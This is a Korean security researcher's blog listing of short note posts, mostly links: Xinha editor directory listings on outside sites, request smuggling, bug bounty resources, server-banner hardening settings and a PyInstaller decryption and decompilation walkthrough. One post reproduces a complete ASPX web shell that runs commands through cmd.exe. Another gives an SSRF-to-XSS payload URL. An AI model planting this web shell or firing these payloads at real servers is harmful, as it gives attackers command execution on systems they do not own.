'분류 전체보기'에 해당되는 글 544건

xinha 에디터 추가

2022. 4. 20. 15:36

http://neon.com.my/editor/xinha/examples/

 

Index of /editor/xinha/examples

 

neon.com.my

http://neon.com.my/editor/xinha/plugins/GetHtml/

 

Index of /editor/xinha/plugins/GetHtml

 

neon.com.my

https://als.uam.edu.pa/xinha/plugins/ImageManager/

 

 

'' 카테고리의 다른 글

CSRF 참고 hacktricks  (0) 2022.04.23
graphql insql  (0) 2022.04.23
aspx 웹쉘 참고  (0) 2022.04.19
HTTP Request Smuggling  (0) 2022.04.09
서버버전 정보 노출 대응방안  (0) 2022.02.25
블로그 이미지

wtdsoul

,

aspx 웹쉘 참고

2022. 4. 19. 14:44

https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx

 

GitHub - tennc/webshell: This is a webshell open source project

This is a webshell open source project. Contribute to tennc/webshell development by creating an account on GitHub.

github.com

 

   
  <%@ Page Language="VB" Debug="true" %>
  <%@ import Namespace="system.IO" %>
  <%@ import Namespace="System.Diagnostics" %>
   
  <script runat="server">
   
  Sub RunCmd(Src As Object, E As EventArgs)
  Dim myProcess As New Process()
  Dim myProcessStartInfo As New ProcessStartInfo(xpath.text)
  myProcessStartInfo.UseShellExecute = false
  myProcessStartInfo.RedirectStandardOutput = true
  myProcess.StartInfo = myProcessStartInfo
  myProcessStartInfo.Arguments=xcmd.text
  myProcess.Start()
   
  Dim myStreamReader As StreamReader = myProcess.StandardOutput
  Dim myString As String = myStreamReader.Readtoend()
  myProcess.Close()
  mystring=replace(mystring,"<","&lt;")
  mystring=replace(mystring,">","&gt;")
  result.text= vbcrlf & "<pre>" & mystring & "</pre>"
  End Sub
   
  </script>
   
  <html>
  <body>
  <form runat="server">
  <p><asp:Label id="L_p" runat="server" width="80px">Program</asp:Label>
  <asp:TextBox id="xpath" runat="server" Width="300px">c:\windows\system32\cmd.exe</asp:TextBox>
  <p><asp:Label id="L_a" runat="server" width="80px">Arguments</asp:Label>
  <asp:TextBox id="xcmd" runat="server" Width="300px" Text="/c net user">/c net user</asp:TextBox>
  <p><asp:Button id="Button" onclick="runcmd" runat="server" Width="100px" Text="Run"></asp:Button>
  <p><asp:Label id="result" runat="server"></asp:Label>
  </form>
  </body>
  </html>

'' 카테고리의 다른 글

graphql insql  (0) 2022.04.23
xinha 에디터 추가  (0) 2022.04.20
HTTP Request Smuggling  (0) 2022.04.09
서버버전 정보 노출 대응방안  (0) 2022.02.25
SSTF Github  (0) 2022.02.23
블로그 이미지

wtdsoul

,

https://skymavis.notion.site/Sky-Mavis-Bug-Bounty-Program-ef33b18c4ee14eaab4698a8efd2c9992

'Bug Bounty' 카테고리의 다른 글

Zendesk Bug Bounty  (0) 2023.05.15
apple-vulnerability-bug-bounty  (0) 2021.06.29
안전하지 않은 직접 객체 참조 (IDOR 공격)  (0) 2021.06.29
apple 버그바운티 사례  (0) 2021.01.17
국내 버그바운티 진행 (ex. 해킹존)  (0) 2021.01.17
블로그 이미지

wtdsoul

,

HTTP Request Smuggling

2022. 4. 9. 12:32

https://hackyboiz.github.io/2022/03/06/syru/funny-smuggling-story-pt2/

 

 

 

'' 카테고리의 다른 글

xinha 에디터 추가  (0) 2022.04.20
aspx 웹쉘 참고  (0) 2022.04.19
서버버전 정보 노출 대응방안  (0) 2022.02.25
SSTF Github  (0) 2022.02.23
LDAP 인젝션  (0) 2022.01.20
블로그 이미지

wtdsoul

,

https://horae.tistory.com/entry/TOMCAT-%EC%97%90%EB%9F%AC-%EC%A0%95%EB%B3%B4-%EC%A0%9C%EA%B1%B0%ED%95%98%EA%B8%B0

 

TOMCAT 에러 정보 제거하기

출처: http://linux.systemv.pe.kr/tomcat-%EC%97%90%EB%9F%AC-%EC%A0%95%EB%B3%B4-%EC%88%A8%EA%B8%B0%EA%B8%B0/ Java 애플리케이션을 작성할때에 에러 발생시 보여줄 에러 페이지를 설정할 수 있습니다. 웹 애..

horae.tistory.com

 

 

'경로 및 정보' 카테고리의 다른 글

PE Viewer  (0) 2022.04.27
Web Directory Fuzz  (0) 2022.04.25
bug bounty epub  (0) 2022.03.18
Pyinstaller Decom  (0) 2022.01.29
Netsparker LDAP 인젝션  (0) 2022.01.20
블로그 이미지

wtdsoul

,

bug bounty epub

경로 및 정보 2022. 3. 18. 13:11

 

https://github.com/skilincer/CyberSource

 

GitHub - skilincer/CyberSource

Contribute to skilincer/CyberSource development by creating an account on GitHub.

github.com

https://github.com/PritamKundu/Bug-Bounty---Important-Books

 

'경로 및 정보' 카테고리의 다른 글

Web Directory Fuzz  (0) 2022.04.25
Tomcat 에러 정보 제거  (0) 2022.03.23
Pyinstaller Decom  (0) 2022.01.29
Netsparker LDAP 인젝션  (0) 2022.01.20
WinDbg 6.12 버전  (0) 2022.01.20
블로그 이미지

wtdsoul

,

Windbg Preview 툴

Github & Tool 2022. 3. 2. 16:06

https://asecurity.dev/entry/Windbg-Preview-Time-Line-Travel-%EB%B6%84%EC%84%9D

 

Windbg Preview - Time Line Travel 분석

오늘 Microsoft Store를 방문하여 새로운 버전의 Windbg가 나온것을 알게되었다. Preview 상태이긴 한데, 어떤 변화가 있는지 궁금하여 설치해보고, 놀라움을 감출수 없었다. 기존 Windbg에서 보여주던 불

asecurity.dev

 

 

'Github & Tool' 카테고리의 다른 글

OSINT Tinfoleak  (0) 2021.06.30
fire eye red_team tool  (0) 2020.12.09
Nmap SSL  (0) 2020.09.07
Burp AES killer  (0) 2020.08.10
UnCaptcha  (0) 2020.08.09
블로그 이미지

wtdsoul

,

https://itinformation.tistory.com/63

 

서버버전 노출 대응방안 모음

@@ apache Coyote ■ server : Apache-Coyote/1.1가 노출되는 상황 ■ 대응방법 - server.xml의 http Connector 설정에 다음과 같이 server=" "를 추가하고 그 사이에 노출을 원하는 문자열을 삽입 - server=""로..

itinformation.tistory.com

 

@@ apache Coyote

 

■ server : Apache-Coyote/1.1가 노출되는 상황

 

 대응방법

- server.xml http Connector 설정에 다음과 같이 server=" "를 추가하고 그 사이에 노출을 원하는 문자열을 삽입

<Connector port="8080" protocol="HTTP/1.1" server="Server" ...>

- server=""로 할 경우 원래와 같이 Apache-Coyote/1.1 =가 표시되니 만일 blank 로 표시하고 싶다면 server=" "와 같이 공백을 포함하여 설정

 

 

  @@ 아파치

 

■ server : Apache Tomcat x.x 가 노출되는 상황

 

 대응방법

 

) apache 서버정보 노출 대응 방법
 
//httpd.conf 파일내 다음 내용 추가 및 수정
ServerTokens Prod
ServerSignature Off

- 설정에 다른 응답헤더 결과

ServerTokens Prod[uctOnly] => Server: Apache

ServerTokens Min[imal] => Server: Apache/2.0.41

ServerTokens OS : Server => Apache/2.0.41 (Unix)

ServerTokens Full : Server => Apache/2.0.41 (Unix) PHP/4.2.2 MyMod/1.2

 

 

 @@ x-powered-by(php)

 

■ server : X-Powered-by : PHP x.x 가 노출되는 상황

 

 대응방법

- 설정파일 standalone.xml 또는 domain.xml에 아래와 같이 설정

<configration>

<jsp-configration x-powered-by=“false”/>

</configration>

 

- php.ini  expose_php 옵션 수정

expose_php = Off

 

 

@@ 에러페이지

 

 에러페이지 리다이렉션 ()

)
//web.xml
<error-page>
<error-code>404</error-code>
<location>/WEB-INF/jsp/common/error/404error.jsp</location>
</error-page>
....
<error-page>
<error-code>500</error-code>
<location>/WEB-INF/jsp/common/error/500error.jsp</location>
</error-page>
<error-page>
<exception-type>java.lang.Throwable</exception-type>
<location>/WEB-INF/jsp/common/error/error.jsp</location>
</error-page>

 

 

 

 

 



출처: https://itinformation.tistory.com/63 [정보보안 스토리]

'' 카테고리의 다른 글

aspx 웹쉘 참고  (0) 2022.04.19
HTTP Request Smuggling  (0) 2022.04.09
SSTF Github  (0) 2022.02.23
LDAP 인젝션  (0) 2022.01.20
ckeditor release-notes  (0) 2021.12.27
블로그 이미지

wtdsoul

,

SSTF Github

2022. 2. 23. 23:13

 

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery

 

SSRF to XSS

by @D0rkerDevil & @alyssa.o.herrera

http://brutelogic.com.br/poc.svg -> simple alert
https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri= -> simple ssrf

https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri=http://brutelogic.com.br/poc.svg

'' 카테고리의 다른 글

HTTP Request Smuggling  (0) 2022.04.09
서버버전 정보 노출 대응방안  (0) 2022.02.25
LDAP 인젝션  (0) 2022.01.20
ckeditor release-notes  (0) 2021.12.27
websquare 이하 경로  (0) 2021.12.21
블로그 이미지

wtdsoul

,

https://blog.system32.kr/286

 

[Python] Pyinstaller Decompile (암호화되어 있는 바이너리 디컴파일)

오늘은 Pyinstaller를 통해서 암호화된 바이너리 디컴파일을 해보도록하겠습니다. 먼저 아래 사진은 그냥 심심해서 만들어 놓은 트위터 자동 글쓰기 프로그램입니다. 하지만 Pyinstaller을 통해서 암

blog.system32.kr

 

오늘은 Pyinstaller를 통해서 암호화된 바이너리 디컴파일을 해보도록하겠습니다.

먼저 아래 사진은 그냥 심심해서 만들어 놓은 트위터 자동 글쓰기 프로그램입니다.

하지만 Pyinstaller을 통해서 암호화 키를 탑재해서 컴파일을 했었지만, 암호가 기억이 안나 리버싱(?)을 통해서 디컴파일을 성공했습니다.

먼저 파일을 분해하기 위해서 pyinstallerextractor 을 사용하도록 하겠습니다. 다운로드 링크는 아래와 같습니다.

https://sourceforge.net/projects/pyinstallerextractor/

 

PyInstaller Extractor

Download PyInstaller Extractor for free. Extract contents of a Windows executable file created by pyinstaller. MIGRATED TO GITHUB https://github.com/extremecoders-re/pyinstxtractor This is a python script to extract the contents of a PyInstaller generated

sourceforge.net

먼저 해당 파일과 다운받은 Pyinstaller Extractor을 한 폴더에 집어 넣고, 다음과 같이 커맨드라인을 수행합니다.

python pyinstxtractor.py twitter.exe

실행한 결과 파일에 암호화가 되어 있다는 메시지와 함께 추출에 실패 했다는 메시지를 발견 할 수 있습니다.

 
[!] Error: Failed to decompress OpenSSL, probably encrypted. Extracting as is.
 
[!] Error: Failed to decompress OpenSSL.SSL, probably encrypted. Extracting as is.
 
[!] Error: Failed to decompress OpenSSL._util, probably encrypted. Extracting as is.
 
[!] Error: Failed to decompress OpenSSL.crypto, probably encrypted. Extracting as is.
 
[!] Error: Failed to decompress OpenSSL.version, probably encrypted. Extracting as is.
 
[!] Error: Failed to decompress PyQt5, probably encrypted. Extracting as is.
 
[!] Error: Failed to decompress PyQt5.uic, probably encrypted. Extracting as is.
 
[!] Error: Failed to decompress PyQt5.uic.Compiler, probably encrypted. Extracting as is.
 
[!] Error: Failed to decompress PyQt5.uic.Compiler.compiler, probably encrypted. Extracting as is.

해당 파일에 암호화가 되어 있는것은 기정 사실이고, 이 암호화를 우회하기 위해서는 몇가지 작업이 필요합니다.

커맨드 라인을 실행하면 다음과 같이 폴더 하나가 생성됩니다.

이 폴더내에는 제가 사용했던 함수들과 외부 모듈등이 함께 존재하며, 암호화 키를 입력하지 않았기 때문에 정상적으로 추출이 되지 않았습니다.

암호화 키를 찾기 위해서 검색과 삽질을 한 결과 암호화 키가 특정 부분에 저장된다는 사실을 알게 되었습니다.

다음과 같이 pyimod00_crypto_key 파일을 찾아줍니다.

HxD 프로그램을 통해서 열어보면 다음과 같이 암호화 키를 발견할 수 있습니다.

해당 키가 항상 저자리에 있는가에 대한 의문을 가졌고, 여러 파일을 만들어 테스트 해본결과 4E 29( N) ) 전 16자리는 항상 암호화 키를 나타내고 있습니다.

해당 키를 바탕으로 다시 디컴파일을 진행합니다. 디컴파일을 진행하기 위해서 다음과 같이 커맨드 라인을 작성합니다.

python pyinstxtractor.py twitter.exe --key=1q2w3e4r5t6y7u8i

동일하게 폴더를 들어가 보면, 바이너리 파일을 확인할 수 있습니다.

현재 twitter 파일은 pyc파일로 존재합니다. 약간의 수정을 더해줍니다.

42 0D 0D 0A 01 00 00 00 00 00 00 00 00 00 00 00

해당 hex값들을 twitter 파일 헤더에 넣습니다. (수정이 아닌 덧붙이기.)

그후 파일 확장자를 pyc를 붙여줍니다.

이제 남은건 디컴파일밖에 남지 않았습니다.

https://github.com/rocky/python-decompile3

 

GitHub - rocky/python-decompile3: Python decompiler for 3.7-3.8 Stripped down from uncompyle6 so we can refactor and start to fi

Python decompiler for 3.7-3.8 Stripped down from uncompyle6 so we can refactor and start to fix up some long-standing problems - GitHub - rocky/python-decompile3: Python decompiler for 3.7-3.8 Stri...

github.com

rocky님의 python-decompile3 도구를 받습니다. 설치까지 슥삭 해주고.

decompyle3 twitter.pyc > test.py

다음과 같이 실행을 해주면 py 코드로 반환된 결과를 확인할 수 있습니다.

난독화가 되어 나오는 이유는 제가 난독화해서 컴파일 했기 때문입니다.

 

긴글 읽어주셔서 감사합니다!

문의나 오탈자 등은 pental@kakao.com 또는 아래 댓글을 통해서 남겨주시면 감사하겠습니다.



출처: https://blog.system32.kr/286 [Pental - Forensics Story]

'경로 및 정보' 카테고리의 다른 글

Tomcat 에러 정보 제거  (0) 2022.03.23
bug bounty epub  (0) 2022.03.18
Netsparker LDAP 인젝션  (0) 2022.01.20
WinDbg 6.12 버전  (0) 2022.01.20
Sonarqube 소스 분석 및 owasp top 10 점검  (0) 2022.01.19
블로그 이미지

wtdsoul

,